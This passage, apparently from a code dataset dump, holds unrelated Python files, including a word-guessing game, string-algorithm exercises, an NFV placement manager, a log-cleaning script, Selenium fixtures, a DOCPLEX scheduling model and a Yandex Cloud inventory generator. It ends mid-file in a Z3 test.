Campbell Farish\nimport random\n\n\n### classes\n\n# letter info class holds onto toggle for if the letter has been guessed \n# and a list of references to where that letter is in the puzzle for quicker search later \nclass letter_info():\n\tdef __init__( self, letter ):\n\t\tself.letter = letter\n\t\tself.guessed = 0\n\t\tself.index_list = [] #(line,index)\n\n\t# return a dash if has been guessed otherwise return letter\n\tdef return_letter( self ):\n\t\tif self.guessed == 0:\n\t\t\treturn self.letter\n\t\telse:\n\t\t\treturn '-'\n\n\n\n### functions\n\n# returns a string of the alphabet with letters that have been guessed lined out\ndef return_alphabetString( curr_alphabet ):\n\n\ttemp_alpha = [ \"\" ]\n\t\n\t# build the 3 rows of the alphabet with new lines in between\n\tfor c in alphabet_line1:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n \")\n\t\n\tfor c in alphabet_line2:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n\")\n\n\tfor c in alphabet_line3:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n\")\n\n\treturn ' '.join( temp_alpha )\n\n\n# returns a string of the current state of the puzzle with guessed letters revealed\ndef return_puzzleString( curr_puzzle ):\n\n\ttemp_puzzle = \"\"\n\n\tfor x in range( 0, 4 ):\n\t\ttemp_puzzle += \" \" + \" \".join( curr_puzzle[x] ) + \"\\n\"\n\n\treturn temp_puzzle\n\n\n# print the entire gameBoard, compile the string and then send to print\ndef print_gameBoard( curr_alphabet, curr_puzzle, curr_score ):\n\n\t#line 1: hash tag border\n\tprint_string = \"###################\\n\"\n\n\t#line 2-4: alphabet\n\tprint_string += return_alphabetString( curr_alphabet )\n\n\t#line 5: hash tag border\n\tprint_string += \"###################\\n\"\n\t\n\t#line 6-9: PUZZLE\n\tprint_string += return_puzzleString( curr_puzzle )\n\t\n\t#line 10: hash tag border\n\tprint_string += \"###################\\n\"\n\n\t#line 11: level and score\n\tprint_string += \"LVS:%2d SCR:%7d\\n\" % ( lives_left, curr_score ) \n\n\t#line 12: hash tag border\n\tprint_string += \"###################\\n\"\n\n\tprint( print_string )\n\n\ndef printNo():\n\tprint(\"\\n :( NO :( \")\n\t\n\ndef printYes():\n\tprint(\"\\n =D YES =D \")\n\n\n\n\n### variables\n\nalphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nalphabet_line1 = \"ABCDEFGHI\"\nalphabet_line2 = \"JKLMNOPQ\"\nalphabet_line3 = \"RSTUVWXYZ\"\nword_list = [ [\"CHICKEN\", \"MONKEY\", \"OWL\", \"ELEPHANT\"], [\"LIZARD\", \"MOUSE\", \"HAMSTER\", \"LEOPARD\"], [\"ALLIGATOR\", \"LIONESS\", \"DOG\", \"PIGEON\"], [\"STORK\", \"LLAMA\", \"KITTEN\", \"PORCUPINE\"], [\"KOALA\", \"TURTLE\", \"KANGAROO\", \"SNAKE\"], [\"SALMON\", \"PANTHER\", \"DOLPHIN\", \"WHALE\"], [\"ROOSTER\", \"PENGUIN\", \"HOUND\", \"WORM\"], [\"MOOSE\", \"LAMB\", \"RHINO\", \"BEETLE\"], [\"ZEBRA\", \"BADGER\", \"LYNX\", \"COUGAR\"], [\"CHEETAH\", \"GRIZZLY\", \"SHARK\", \"GECKO\"]]\n\n\n\n\n# begin round\n\n# initialize variables\ncurr_level = 1\ncurr_score = 0\n\n\n# ask to play\nshould_exit = 0\nlives_left = 10\nwhile ( should_exit == 0 ):\n\n
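\t# one full round per loop pass; typing '1' at the guess prompt exits the game early\n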
\tplay_choice = ( raw_input( \" PLAY AGAIN? (Y/N): \" ) ).upper()\n\t\n\tif play_choice == 'N':\n\t\tshould_exit = 1\n\t\n\telif play_choice == 'Y':\n\n\t\t# choose a word\n\t\tsecret_words = random.choice(word_list)\n\t\tsecret_words_all = secret_words[0] + secret_words[1] + secret_words[2] + secret_words[3]\n\t\tnum_of_letters_left = len(secret_words_all)\n\n\t\t# pre-process the word\n\n\t\t# initialize variables\n\t\tcurr_puzzle = [[],[],[],[]]\n\t\tcurr_alphabet = dict()\n\n\t\t# create a dictionary of letters \n\t\tfor c in alphabet:\n\t\t\tcurr_alphabet[c] = letter_info(c)\n\n\t\t# pre-process the four lines/words\n\t\tfor x in range( 0, 4 ):\n\t\t\tcounter = 0\n\t\t\tfor c in secret_words[x]:\n\t\t\t\t#blank out the game board\n\t\t\t\tcurr_puzzle[x].append('_')\n\t\t\t\t#record indices of if/when they appear in secret word\n\t\t\t\tcurr_alphabet[c].index_list.append([x,counter])\n\t\t\t\tcounter = counter + 1\n\n\n\t\t#loop while the game is not won or lost (in won state or lost state)\n\t\twhile ( num_of_letters_left !=0 and should_exit == 0 ):\n\n\t\t\t# print Game Screen\n\t\t\tprint_gameBoard( curr_alphabet, curr_puzzle, curr_score )\n\n\t\t\t# get a single guess input \n\t\t\tvalid_guess = 0\n\t\t\twhile valid_guess == 0:\n\n\t\t\t\t# input a guess letter from the user\n\t\t\t\tcurr_guess = (raw_input(\" GUESS A LETTER: \")).upper()\n\t\t\t\t\n\t\t\t\t# break out and exit program with number 1\n\t\t\t\tif curr_guess == '1':\n\t\t\t\t\tshould_exit = 1\n\t\t\t\t\tvalid_guess = 1\n\t\t\t\t# make sure choice is letter\n\t\t\t\telif curr_guess not in alphabet:\n\t\t\t\t\tprint(\" LETTERS ONLY\")\n\t\t\t\t# make sure it's not empty\n\t\t\t\telif curr_guess == '':\n\t\t\t\t\tprint(\" I DIDN'T GET THAT\")\n\t\t\t\t# if it's a valid unguessed letter then move on\n\t\t\t\telif curr_alphabet[curr_guess].guessed == 0:\n\t\t\t\t\t#record that the letter has been guessed and set loop breaking condition\n\t\t\t\t\tcurr_alphabet[curr_guess].guessed = 1\n\t\t\t\t\tvalid_guess = 1\n\t\t\t\t# this letter has already been guessed, input again\n\t\t\t\telse:\n\t\t\t\t\t#or loop back around and try again\n\t\t\t\t\tprint(\" ALREADY GUESSED\")\n\n\t\t\tif should_exit == 0:\n\t\t\t\t#check if the entered letter is in the secret word\n\t\t\t\ti_list = curr_alphabet[curr_guess].index_list\n\t\t\t\tif len(i_list) != 0:\n\t\t\t\t\t#if it is in the secret word, reveal letter in the secret word\n\t\t\t\t\tfor i in i_list:\n\t\t\t\t\t\tline_num = i[0]\n\t\t\t\t\t\tline_idx = i[1]\n\t\t\t\t\t\tcurr_line = curr_puzzle[line_num]\n\t\t\t\t\t\tcurr_line[line_idx] = curr_guess\n\t\t\t\t\t\tnum_of_letters_left = num_of_letters_left - 1\n\t\t\t\t\t\tcurr_score += 50\n\t\t\t\t\tprintYes()\n\t\t\t\telse:\n\t\t\t\t\tlives_left = lives_left - 1\n\t\t\t\t\tcurr_score -= 50\n\t\t\t\t\tif lives_left == 0:\n\t\t\t\t\t\tshould_exit = 1\n\t\t\t\t\tprintNo()\n\n\n\t\t# round over: won when no letters are left, lost when no lives are left, otherwise the player quit\n\t\tif num_of_letters_left == 0:\n\t\t\tprint(\"WAY TO GO\")\n\t\t\tprint( return_puzzleString( curr_puzzle ) )\n\t\telif lives_left == 0:\n\t\t\tprint(\"DANG :(\")\n\t\telse:\n\t\t\tprint(\"GOODBYE.\")","sub_path":"SecretWord_Game_v1.0.py","file_name":"SecretWord_Game_v1.0.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173232851","text":"# encoding=utf-8\nimport collections\n\n\nclass Solution(object):\n    \"\"\"\n    Substring search can be solved with a double for loop; the more efficient\n    approach is the KMP algorithm. The double for loop takes some care, since\n    the relative lengths of the source and target strings must be accounted\n    for. Looping over the target string is clearly necessary, so the place to\n    optimize is how the source string is visited. The simple, direct solution\n    uses the length of the source string as the loop's end index, which then\n    has to handle the case where the remaining source is too short to match\n    the target; the more efficient variant iterates only over the source\n    indices where a match could still start.\n    \"\"\"\n\n    @classmethod\n    def find_sub_str(cls, source, target):\n        if source is None and target is None:\n            return -1\n        for i in range((len(source) - len(target)) + 1):\n            for j in range(len(target)):\n                if source[i + j] != target[j]:\n                    break\n            else:\n                return i\n        return -1\n\n    \"\"\"\n    Two strings are anagrams of each other (case-sensitive, whitespace\n    included) exactly when they contain the same count of every distinct\n    character. The usual approach for such counting problems is to traverse\n    both strings, tally how often each character occurs, and return False if\n    the tallies differ. Many simple string interview questions are variations\n    of this one.\n    \"\"\"\n\n    @classmethod\n    def anagram1(cls, first_str, second_str):\n        return collections.Counter(first_str) == collections.Counter(second_str)\n\n    @classmethod\n    def anagram2(cls, first_str, second_str):\n        if len(first_str) != len(second_str):\n            return False\n        if not first_str or not second_str:\n            return False\n        counter = [0 for i in range(256)]\n        for i in range(len(first_str)):\n            counter[ord(first_str[i])] += 1\n            counter[ord(second_str[i])] -= 1\n        for item in counter:\n            if item != 0:\n                return False\n        return True\n\n    @classmethod\n    def a_contains_b(cls, str_a, str_b):\n        letters = collections.defaultdict(int)\n        for letter in str_a:\n            letters[letter] += 1\n        for letter in str_b:\n            if letter in letters:\n                if letters[letter] < 0:\n                    return False\n                else:\n                    letters[letter] -= 1\n            else:\n                return False\n        return True\n\n    @classmethod\n    def anagram_list1(cls, str_list):\n        if len(str_list) < 2:\n            return []\n        result = []\n        visited = [False] * len(str_list)\n        for i, str1 in enumerate(str_list):\n            has_anagram = False\n            for j, str2 in enumerate(str_list):\n                if i < j and not visited[j] and cls.anagram2(str1, str2):\n                    result.append(str2)\n                    has_anagram = True\n                    visited[j] = True\n            if not visited[i] and has_anagram:\n                result.append(str1)\n        return result\n\n    @classmethod\n    def anagram_list2(cls, str_list):\n        if len(str_list) < 2:\n            return []\n        dic = {}\n        result = []\n        for s in str_list:\n            if ''.join(sorted(s)) not in dic:\n                dic[''.join(sorted(s))] = 1\n            else:\n                dic[''.join(sorted(s))] += 1\n        for s in str_list:\n            if dic[''.join(sorted(s))] > 1:\n                result.append(s)\n        return result\n\n    @classmethod\n    def longest_common_substring_num(cls, str1, str2):\n        max_num = 0\n        for i in range(len(str1)):\n            for j in range(len(str2)):\n                step = 0\n                while i + step < len(str1) and j + step < len(str2) and str1[i + step] == str2[j + step]:\n                    step += 1\n                if step > max_num:\n                    max_num = step\n        return max_num\n\n    @classmethod\n    def rotate_str(cls, line, offset):\n        if line is None:\n            return line\n        offset %= len(line)\n        before = line[:len(line) - offset]\n        after = line[len(line) - offset:]\n        return after + before\n\n\nif __name__ == '__main__':\n    c = collections.Counter(['n', 'k', 'n', 'i'])\n    print(c.keys())\n    dic1 = {'n': 1, 'h': 2}\n    dic2 = {'n': 1, 'h': 3}\n    if dic1 == dic2:\n        print('true')\n    ss = Solution.anagram2('nihao', 'haoni')\n    print(ss)\n\n    cc = Solution.anagram_list2(['nihao', 'haoni', 'inhao', 'ggg', 'onhai'])\n    print(cc)\n\n    ff = Solution.longest_common_substring_num('nihao123', '123')\n    print(ff)\n\n    gg = Solution.rotate_str('nihao123', 3)\n    print(gg)\n","sub_path":"algorithm/shi_yan_lou/algorithm_str.py","file_name":"algorithm_str.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361987212","text":"\"\"\"\nCopyright (c) 2015 SONATA-NFV\nALL RIGHTS RESERVED.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    
http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nNeither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]\nnor the names of its contributors may be used to endorse or promote\nproducts derived from this software without specific prior written\npermission.\n\nThis work has been performed in the framework of the SONATA project,\nfunded by the European Commission under Grant number 671517 through\nthe Horizon 2020 and 5G-PPP programmes. The authors would like to\nacknowledge the contributions of their colleagues of the SONATA\npartner consortium (www.sonata-nfv.eu).\n\"\"\"\n\nimport logging\nimport yaml\nfrom sonsmbase.smbase import sonSMbase\n\nlogging.basicConfig(level=logging.INFO)\nLOG = logging.getLogger(\"ssm-placement-1\")\nLOG.setLevel(logging.DEBUG)\nlogging.getLogger(\"son-mano-base:messaging\").setLevel(logging.DEBUG)\n\n\nclass PlacementSSM(sonSMbase):\n def __init__(self):\n\n self.smtype = 'ssm'\n self.sfname = 'default'\n self.name = 'placement'\n self.id = '1'\n self.version = 'v0.1'\n self.description = 'Placement SSM'\n\n super(self.__class__, self).__init__(smtype= self.smtype,\n sfname= self.sfname,\n name= self.name,\n id = self.id,\n version= self.version,\n description= self.description)\n\n def on_registration_ok(self):\n LOG.debug(\"Received registration ok event.\")\n\n # Register to task topic and to place topic\n topic = 'placement.ssm' + self.uuid\n\n self.manoconn.subscribe(self.on_place,topic= topic)\n\n LOG.info(\"Subscribed to \" + str(topic))\n\n def on_place(self, ch, method, properties, payload):\n \"\"\"\n This method organises the placement calculation, and\n provides the response for the SLM.\n \"\"\"\n\n LOG.info(\"Placement started\")\n message = yaml.load(payload)\n topology = message['topology']\n nsd = message['nsd']\n functions = message['vnfds']\n\n mapping = self.placement_alg(nsd, functions, topology)\n\n if mapping is None:\n LOG.info(\"The mapping calculation has failed.\")\n message = {}\n message['error'] = 'Unable to perform placement.'\n message['status'] = 'ERROR'\n \n else:\n LOG.info(\"The mapping calculation has succeeded.\")\n message = {}\n message['error'] = None\n message['status'] = \"COMPLETED\"\n message['mapping'] = mapping\n\n is_dict = isinstance(message, dict)\n LOG.info(\"Type Dict: \" + str(is_dict))\n\n payload = yaml.dump(message)\n self.manoconn.notify('placement.ssm' + self.uuid,\n payload,\n correlation_id=properties.correlation_id)\n\n return\n\n def placement_alg(self, nsd, functions, topology):\n \"\"\"\n This is the default placement algorithm that is used if the SLM\n is responsible to perform the placement\n \"\"\"\n LOG.info(\"Mapping algorithm started.\")\n mapping = {}\n\n for vnfd in functions:\n needed_cpu = vnfd['virtual_deployment_units'][0]['resource_requirements']['cpu']['vcpus']\n needed_mem = vnfd['virtual_deployment_units'][0]['resource_requirements']['memory']['size']\n needed_sto = vnfd['virtual_deployment_units'][0]['resource_requirements']['storage']['size']\n\n for vim in topology:\n cpu_req = needed_cpu <= (vim['core_total'] - vim['core_used'])\n mem_req = needed_mem <= (vim['memory_total'] - vim['memory_used'])\n\n if cpu_req and mem_req:\n print('VNF ' + vnfd['instance_uuid'] 
+ ' mapped on VIM ' + vim['vim_uuid'])\n mapping[vnfd['instance_uuid']] = {}\n mapping[vnfd['instance_uuid']]['vim'] = vim['vim_uuid']\n vim['core_used'] = vim['core_used'] + needed_cpu\n vim['memory_used'] = vim['memory_used'] + needed_mem\n break\n \n # Check if all VNFs have been mapped\n if len(mapping.keys()) == len(functions):\n LOG.info(\"Mapping succeeded: \" + str(mapping))\n return mapping\n else:\n return None\n\ndef main():\n PlacementSSM()\n\nif __name__ == '__main__':\n main()\n","sub_path":"softnetworking/ssms/ssms/placement/placement/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"98674582","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.category, name='category'),\n path('detail//', views.lecture_detail_page, name='detail'), #lecture_detail\n path('result/', views.select_lecture, name='categoryresult'),\n# path(')\n\n# path('url')\n]\n\n","sub_path":"categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97503928","text":"import os\r\nimport sys\r\n\r\nlogs = \"../mmwave_logs/\"\r\n\r\nif \"-p\"in sys.argv:\r\n\tlogs=str(sys.argv[sys.argv.index(\"-p\")+1])\r\n\r\ndl = logs+\"/Complete/DL/\"\r\nul = logs+\"/Complete/UL/\"\r\n\r\nfor filename in os.listdir(dl):\r\n tmpname = dl+filename+\"_tmp.txt\"\r\n tmpfile = open(tmpname,\"w+\")\r\n targfile = dl+filename\r\n\r\n with open(targfile,\"r\") as file:\r\n for row in file:\r\n tmpfile.write(row.replace('\"','').replace(\"'\",\"\"))\r\n\r\n os.system(\"rm '\"+targfile+\"'\")\r\n os.system(\"mv '\"+tmpname+\"' '\"+targfile+\"'\")\r\n\r\nfor filename in os.listdir(ul):\r\n tmpname = ul+filename+\"_tmp.txt\"\r\n tmpfile = open(tmpname,\"w+\")\r\n targfile = ul+filename\r\n\r\n with open(targfile,\"r\") as file:\r\n for row in file:\r\n tmpfile.write(row.replace('\"','').replace(\"'\",\"\"))\r\n\r\n os.system(\"rm '\"+targfile+\"'\")\r\n os.system(\"mv '\"+tmpname+\"' '\"+targfile+\"'\")","sub_path":"scripts/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506443664","text":"import csv\nfrom lookup import Lookup\n\ndef process_csv(filename):\n\n with open(filename, 'r') as input_file:\n input = csv.reader(input_file)\n results = []\n\n lookup = Lookup()\n\n for row in input:\n results.append(lookup.find_by_vowelless_hebrew_and_english(row[0].strip(), row[1].strip()))\n\n output = [(word.word_vowelless, word.word, word.meaning) for word in results if word is not None]\n\n with open('card_output.csv', 'w') as output_file:\n writer = csv.writer(output_file)\n writer.writerows(output)\n\ndef test():\n process_csv('input.csv')\n\nif __name__ == '__main__':\n test()","sub_path":"process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"222320324","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Mean Cruncher\")\nwindow.geometry(\"800x400\")\n\nentries = [ ]\nfor i in range(5):\n entries.append(Entry(window))\n entries[i].place(x=10, 
y=10+(20*i))\n\nwindow.mainloop()\n","sub_path":"interface/makingEntries.py","file_name":"makingEntries.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"363481981","text":"import pytest\nfrom selenium import webdriver\n\n\nHEADLESS = False\nBASE_WEBDRIVER = webdriver.PhantomJS if HEADLESS else webdriver.Chrome\nHOST_ADDRESS = 'http://localhost:8080/'\n\n\nclass BaseBrowser(BASE_WEBDRIVER):\n    def __init__(self, host_address, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.implicitly_wait(15)\n        self.set_page_load_timeout(15)\n        self.set_window_size(1024, 768)\n        self.get(host_address)\n\n    @property\n    def body_text(self):\n        return self.find_element_by_tag_name('body').text\n\n    def clear_local_storage(self):\n        self.execute_script('localStorage.clear()')\n        self.refresh()\n\n\ndef setup_browser_fixture(BrowserClass):\n    def browser():\n        _browser = BrowserClass(host_address=HOST_ADDRESS)\n        yield _browser\n        _browser.clear_local_storage()\n        _browser.quit()\n    return pytest.fixture(browser)\n","sub_path":"integration_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"376732865","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom pyuvdata import UVData\nfrom uvtools import plot\n\nif __name__ == \"__main__\":\n    plt.ion()\n    \n    # Load the sample data.\n    this_dir = Path(__file__).parent\n    test_file = list(this_dir.glob(\"*.uvh5\"))[0]\n    uvd = UVData()\n    uvd.read(test_file)\n\n    # Check that making a plot works.\n    freqs = np.unique(uvd.freq_array)\n    fselect = (freqs > 110e6) & (freqs < 190e6)\n    uvd.select(frequencies=freqs[fselect])\n    antpairpol = uvd.get_antpairpols()[0]\n    fig, ax = plot.labeled_waterfall(uvd, antpairpol=antpairpol)\n    plt.pause(5)\n    plt.close()\n","sub_path":"Lessons/HERADataPartI/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"8513100","text":"coin = 0\nday = int(input(\"Please enter the number of days: \"))\ncur = 0\ntotal = 0\n\nwhile cur + coin + 1 <= day:\n    coin += 1\n    total += coin * coin\n    cur += coin\n\ntotal += (day - cur) * (coin+1)\n\nprint(total)\n\n\n\n#cur = 0\ntotal = 0\ncoin = 1\ncounter = 0\nfor i in range(day):\n    total += coin\n    counter += 1\n    if counter == coin:\n        counter = 0\n        coin += 1\n\nprint(total)\n\na = (0,1,4)\nprint(max(a))\n\n\n#","sub_path":"PythonFunnyProgram/00.classic/exercise/king_coin.py","file_name":"king_coin.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174734309","text":"#!/Users/ssi/yc_dynamic_inventory/bin/python\nimport json\nimport os\n\nimport yaml\nimport yandexcloud\nfrom yaml import Loader\nfrom yandex.cloud.compute.v1.instance_service_pb2 import ListInstancesRequest\nfrom yandex.cloud.compute.v1.instance_service_pb2_grpc import InstanceServiceStub\n\n\ndef find_by_labels(instances, labels):\n    if len(labels) == 0:\n        return instances\n\n    res = []\n    for inst in instances:\n        for k, v in labels.items():\n            lbls = v\n            if isinstance(v, str):\n                lbls = [v]\n            if k in inst.labels and any(inst.labels[k] == lbl for lbl in lbls):\n                res.append(inst)\n    return res\n\n\nclass ConfigIsNotExists(Exception):\n    def __init__(self, msg, find_paths, config_name):\n        
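# keep the searched paths and config name so callers can report where the lookup failed\n        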
super().__init__(msg)\n self.find_paths = find_paths\n self.config_name = config_name\n\n\nclass ValidationError(Exception):\n pass\n\n\nclass ConfigFinder:\n DEFAULT_PATHS = (\n './',\n '~/.yandex_cloud',\n )\n\n CONFIG_NAME = 'config.yaml'\n\n @classmethod\n def __get_path(cls):\n for path in cls.DEFAULT_PATHS:\n found_path = os.path.join(path, cls.CONFIG_NAME)\n if not os.path.exists(found_path):\n continue\n return found_path\n raise ConfigIsNotExists(\"Config wasn't found\", cls.DEFAULT_PATHS, cls.CONFIG_NAME)\n\n @classmethod\n def stream(cls):\n config_path = cls.__get_path()\n with open(config_path) as f:\n stream = f.read()\n return stream\n\n\nclass ServiceAccount(dict):\n def __init__(self, path=None, stream=None):\n if path is not None and stream is not None:\n raise ValueError(\"Parameter conflict: only one of `path` or `stream` must be set.\")\n if path is None and stream is None:\n raise ValueError(\"Parameter error: one of `path` or `stream` must be set.\")\n if path is not None:\n with open(path) as f:\n stream = f.read()\n self.__parsed_data = self._set_from_stream(stream)\n\n def __getitem__(self, item):\n return self.__parsed_data[item]\n\n @classmethod\n def _set_from_stream(cls, stream):\n # TODO: validate?\n return json.loads(stream)\n\n def get(self, k):\n return self.__parsed_data.get(k)\n\n\nclass Config:\n _FINDER = ConfigFinder\n _SERVICE_ACCOUNT = ServiceAccount\n\n _REQUIRED_FIELDS = (\n 'folderId',\n 'keyFile',\n 'tags',\n )\n\n def __init__(self):\n self._finder_instance = self._FINDER()\n self.__stream = self._finder_instance.stream()\n self.__parsed_config = yaml.load(self.__stream, Loader=Loader)\n\n self._service_account = None\n\n self._validate()\n\n def __getitem__(self, item):\n return self.__parsed_config.get(item)\n\n def _validate(self):\n try:\n self._check_required_field()\n except KeyError as k:\n raise ValidationError(\"Key %s is required.\" % k)\n if not self._is_sa_key_file_exist():\n raise ValidationError(\n \"Service Account credentials was not found. 
Path: %s\" % self.__parsed_config['keyFile']\n )\n\n def _check_required_field(self):\n _ = all(key in self.__parsed_config for key in self._REQUIRED_FIELDS)\n\n def _is_sa_key_file_exist(self):\n return os.path.exists(self.__parsed_config['keyFile'])\n\n @property\n def service_account(self):\n if self._service_account is None:\n self._service_account = self._SERVICE_ACCOUNT(self.__parsed_config['keyFile'])\n return self._service_account\n\n\nconfig = Config()\n\n\ndef generate_inventory(conf):\n sdk = yandexcloud.SDK(service_account_key=conf.service_account)\n\n c = sdk.client(InstanceServiceStub)\n\n l = c.List(ListInstancesRequest(\n folder_id=conf['folderId']\n ))\n\n tags = [k for k in conf['tags'].keys()]\n\n tag_hosts_map = {\n tag: [\n i.network_interfaces[0].primary_v4_address.one_to_one_nat.address for i in find_by_labels(\n l.instances, {'tags': [tag]}\n )\n ] for tag in conf['tags'].keys()\n }\n\n def set_host_as_value(var_hosts):\n if isinstance(var_hosts, list):\n return [set_host_as_value(host) for host in var_hosts]\n if any(var_hosts == tag_name for tag_name in tags):\n return tag_hosts_map[var_hosts]\n if var_hosts.find('[') != -1 and var_hosts.find(']') == len(var_hosts) - 1:\n tag_name, index = var_hosts.split('[')\n index = int(index[:-1])\n if len(tag_hosts_map[tag_name]) <= index:\n # FIXME: it seems like an error in the config\n return []\n return tag_hosts_map[tag_name][index]\n\n def extract_var(var):\n if 'value' in var:\n return var['value']\n return set_host_as_value(var['hosts'])\n\n # extract vars\n tag_host_vars_map = {}\n for tag in tags:\n if 'vars' not in config['tags'][tag] or config['tags'][tag]['vars'] is None:\n continue\n tag_host_vars_map[tag] = {\n var_name: extract_var(config['tags'][tag]['vars'][var_name]) for var_name in config['tags'][tag]['vars']\n }\n\n result_inventory = {}\n for tag, hosts in tag_hosts_map.items():\n hosts_name = tag\n if 'hostsName' in config['tags'][tag]:\n hosts_name = config['tags'][tag]['hostsName']\n result_inventory[hosts_name] = {\n 'hosts': hosts\n }\n if tag in tag_host_vars_map:\n result_inventory[hosts_name]['vars'] = tag_host_vars_map[tag]\n return result_inventory\n\n\ninventory = generate_inventory(config)\n\nprint(json.dumps(inventory))\n","sub_path":"yc_inventory.py","file_name":"yc_inventory.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"176750636","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 5 17:22:02 2020\n\n@author: hoale\n\"\"\"\n\n\"\"\"\nThis file contains CP solver based on DOCPLEX IBM\n\"\"\"\n\n\"\"\" IBM CPLEX \"\"\"\nfrom docplex.cp.model import CpoModel, start_of, end_of, size_of\n\n\"\"\" Creation of CP model with constraints (subproblem 2) \"\"\"\ndef _create_cp_model(all_jobs, job_ids, job_num, all_machines, r_times, d_times, p_intervals, assign):\n \"\"\" Prepare the index for decision variables \"\"\"\n # typle of jobs, form (job_0, job_1, ...)\n jobs = tuple(job_ids)\n \n \"\"\" Parameters model (dictionary) \"\"\"\n # 1. release time\n release_time = dict(zip(jobs, tuple(r_times)))\n # 2. due time\n due_time = dict(zip(jobs, tuple(d_times)))\n # 3. 
processing time\n process_time = dict(zip(jobs, tuple(p_intervals)))\n \n \"\"\" Creation of the CP model container \"\"\"\n cp_model = CpoModel(name=\"CP-Model\")\n \n \"\"\" Creation of variables \"\"\"\n # for j_id in all_jobs:\n # for m_id in all_machines:\n # if assign[(j_id, m_id)].x == 1:\n # print(assign[(j_id, m_id)])\n # 1. Variable subscript z_i represents machine selected to process job i\n z = {j_id: m_id for j_id in all_jobs for m_id in all_machines if assign[(j_id, m_id)].x == 1}\n # print(\"z: \", z)\n\n \"\"\" DOCPLEX \"\"\"\n # 1. list of interval variable, is a list of start time of jobs (i.start in CP model) \n start_time_cp = [cp_model.interval_var(size=process_time[j_id][z[j_id]], \n name=\"start-time-J{}\".format(j_id)) for j_id in all_jobs]\n # if assign[(j_id, z[j_id])].x == 1]\n \n \"\"\" Create constraints \"\"\"\n # 1. job release time constraint\n cp_model.add(start_of(start_time_cp[i]) >= release_time[i] for i in jobs)\n \n # 2. job due time constraint\n cp_model.add(start_of(start_time_cp[i]) <= due_time[i] - process_time[i][z[i]] for i in jobs)\n\n # 3. duration of processing one job constraint\n cp_model.add(size_of(start_time_cp[i]) == process_time[i][z[i]] for i in jobs)\n \n # 4. assignment of a job to a specific machine as well as sequence of jobs assigned to same machine\n # \"requires\" in OPL construct\n # job i requires unary resource corresponding to machine which was assigned from MILP\n # force no overlap for jobs \n # Constrain jobs to no overlap on each machine\n # Force no overlap for jobs executed on a same machine\n # disjunctive resource (unary resource): end(J1) <= start(J2) ||end(J2) <= start(J1)\n for job_id1 in range(job_num - 1):\n for job_id2 in range(job_id1 + 1, job_num):\n # print(\"job id1 & job id2\", job_id1, job_id2)\n if z[job_id1] == z[job_id2]:\n cp_model.add(cp_model.logical_or(\n end_of(start_time_cp[job_id1]) <= start_of(start_time_cp[job_id2]), \n end_of(start_time_cp[job_id2]) <= start_of(start_time_cp[job_id1])))\n\n return cp_model, start_time_cp","sub_path":"hybrid/hybrid_cp_solver.py","file_name":"hybrid_cp_solver.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"59973061","text":"#!/usr/bin/env python3\nimport logging\nimport z3\n\nfrom modelLang import parsers, backends\n\nfrom modelLang.parsers import Parser\nfrom modelLang.backends import Z3Backend\n\nfrom pwnlib.util.packing import unpack\n\nclass NegativeCombinationTest():\n testfile1 = \"tests/functional/mod1.lmod\"\n testfile2 = \"tests/functional/mod2.lmod\"\n\n @staticmethod\n def run():\n parser1 = Parser()\n parser1.parse_file(NegativeCombinationTest.testfile1)\n\n backend1 = Z3Backend(name=NegativeCombinationTest.testfile1,\n voi=\"variable\")\n backend1.log.setLevel(logging.ERROR)\n backend1.exec_statements(parser1.statements)\n\n parser2 = Parser()\n parser2.parse_file(NegativeCombinationTest.testfile2)\n\n backend2 = Z3Backend(name=NegativeCombinationTest.testfile2,\n voi=\"variable\")\n 